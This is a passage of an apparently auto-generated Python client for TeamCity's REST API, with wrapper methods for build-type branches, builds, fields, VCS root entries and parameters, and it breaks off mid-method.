    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_vcs_root_entries`")  # noqa: E501

    collection_formats = {}

    # A TeamCityObject is reduced to its locator id.
    path_params = {}
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params['btLocator'] = locator  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = params.get('body')

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='VcsRootEntries',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_branches_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """serve_branches  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_branches_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str locator:
    :param str fields:
    :return: Branches
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_branches" % key
            )
        params[key] = val

    # The path parameter is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_branches`")  # noqa: E501

    collection_formats = {}

    # A TeamCityObject is reduced to its locator id.
    path_params = {}
    value = params['bt_locator']
    if isinstance(value, TeamCityObject):
        value = value.locator_id
    path_params['btLocator'] = value  # noqa: E501

    # Optional query parameters, in the order the API expects them.
    query_params = []
    for name in ('locator', 'fields'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/branches', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Branches',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_build_field_with_http_info(self, bt_locator, build_locator, field, **kwargs):  # noqa: E501
    """serve_build_field  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_build_field_with_http_info(bt_locator, build_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str build_locator: (required)
    :param str field: (required)
    :return: str
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'build_locator', 'field']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator,
              'build_locator': build_locator,
              'field': field}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_build_field" % key
            )
        params[key] = val

    # All three path parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_field`")  # noqa: E501
    if params.get('build_locator') is None:
        raise ValueError("Missing the required parameter `build_locator` when calling `serve_build_field`")  # noqa: E501
    if params.get('field') is None:
        raise ValueError("Missing the required parameter `field` when calling `serve_build_field`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('buildLocator', 'build_locator'),
                                  ('field', 'field')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/builds/{buildLocator}/{field}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_build_type_builds_tags_with_http_info(self, bt_locator, field, **kwargs):  # noqa: E501
    """serve_build_type_builds_tags  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_build_type_builds_tags_with_http_info(bt_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str field: (required)
    :return: Tags
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'field']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator, 'field': field}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_build_type_builds_tags" % key
            )
        params[key] = val

    # Both parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_type_builds_tags`")  # noqa: E501
    if params.get('field') is None:
        raise ValueError("Missing the required parameter `field` when calling `serve_build_type_builds_tags`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    # NOTE(review): 'field' is placed in path_params although the URL
    # template below has no {field} placeholder — kept as generated.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('field', 'field')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/buildTags', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Tags',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_build_type_field_with_http_info(self, bt_locator, field, **kwargs):  # noqa: E501
    """serve_build_type_field  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_build_type_field_with_http_info(bt_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str field: (required)
    :return: str
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'field']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator, 'field': field}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_build_type_field" % key
            )
        params[key] = val

    # Both path parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_type_field`")  # noqa: E501
    if params.get('field') is None:
        raise ValueError("Missing the required parameter `field` when calling `serve_build_type_field`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('field', 'field')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/{field}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_build_type_xml_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """serve_build_type_xml  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_build_type_xml_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: BuildType
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_build_type_xml" % key
            )
        params[key] = val

    # The path parameter is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_type_xml`")  # noqa: E501

    collection_formats = {}

    # A TeamCityObject is reduced to its locator id.
    path_params = {}
    value = params['bt_locator']
    if isinstance(value, TeamCityObject):
        value = value.locator_id
    path_params['btLocator'] = value  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='BuildType',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_build_with_project_with_http_info(self, bt_locator, build_locator, **kwargs):  # noqa: E501
    """serve_build_with_project  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_build_with_project_with_http_info(bt_locator, build_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str build_locator: (required)
    :param str fields:
    :return: Build
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'build_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator, 'build_locator': build_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_build_with_project" % key
            )
        params[key] = val

    # Both path parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_with_project`")  # noqa: E501
    if params.get('build_locator') is None:
        raise ValueError("Missing the required parameter `build_locator` when calling `serve_build_with_project`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('buildLocator', 'build_locator')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/builds/{buildLocator}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Build',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __serve_builds_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """serve_builds  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__serve_builds_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str status:
    :param str triggered_by_user:
    :param bool include_personal:
    :param bool include_canceled:
    :param bool only_pinned:
    :param list[str] tag:
    :param str agent_name:
    :param str since_build:
    :param str since_date:
    :param int start:
    :param int count:
    :param str locator:
    :param str fields:
    :return: Builds
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'status', 'triggered_by_user', 'include_personal', 'include_canceled', 'only_pinned', 'tag', 'agent_name', 'since_build', 'since_date', 'start', 'count', 'locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method serve_builds" % key
            )
        params[key] = val

    # The path parameter is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `serve_builds`")  # noqa: E501

    collection_formats = {}

    # A TeamCityObject is reduced to its locator id.
    path_params = {}
    value = params['bt_locator']
    if isinstance(value, TeamCityObject):
        value = value.locator_id
    path_params['btLocator'] = value  # noqa: E501

    # Map python argument names onto wire query-parameter names, in the
    # order the original generated client emitted them.
    query_map = (
        ('status', 'status'),
        ('triggeredByUser', 'triggered_by_user'),
        ('includePersonal', 'include_personal'),
        ('includeCanceled', 'include_canceled'),
        ('onlyPinned', 'only_pinned'),
        ('tag', 'tag'),
        ('agentName', 'agent_name'),
        ('sinceBuild', 'since_build'),
        ('sinceDate', 'since_date'),
        ('start', 'start'),
        ('count', 'count'),
        ('locator', 'locator'),
        ('fields', 'fields'),
    )
    query_params = []
    for wire_name, local_name in query_map:
        if local_name in params:
            query_params.append((wire_name, params[local_name]))  # noqa: E501
            if local_name == 'tag':
                # 'tag' is repeatable and serialized as multiple pairs.
                collection_formats['tag'] = 'multi'  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/builds', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Builds',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __set_build_type_field_with_http_info(self, bt_locator, field, **kwargs): # noqa: E501
"""set_build_type_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_build_type_field_with_http_info(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str field: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'field', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_build_type_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_build_type_field`") # noqa: E501
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `set_build_type_field`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/{field}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_1_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameter_1 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_1_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_2_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_2 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_2_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_2" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_2`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_type_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_type_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param Type body:
:return: Type
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_type`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_type`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Type', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_type_raw_value_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_type_raw_value # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_type_raw_value_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_type_raw_value" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_type_raw_value`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_type_raw_value`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type/rawValue', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_value_long_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_value_long # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_value_long_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
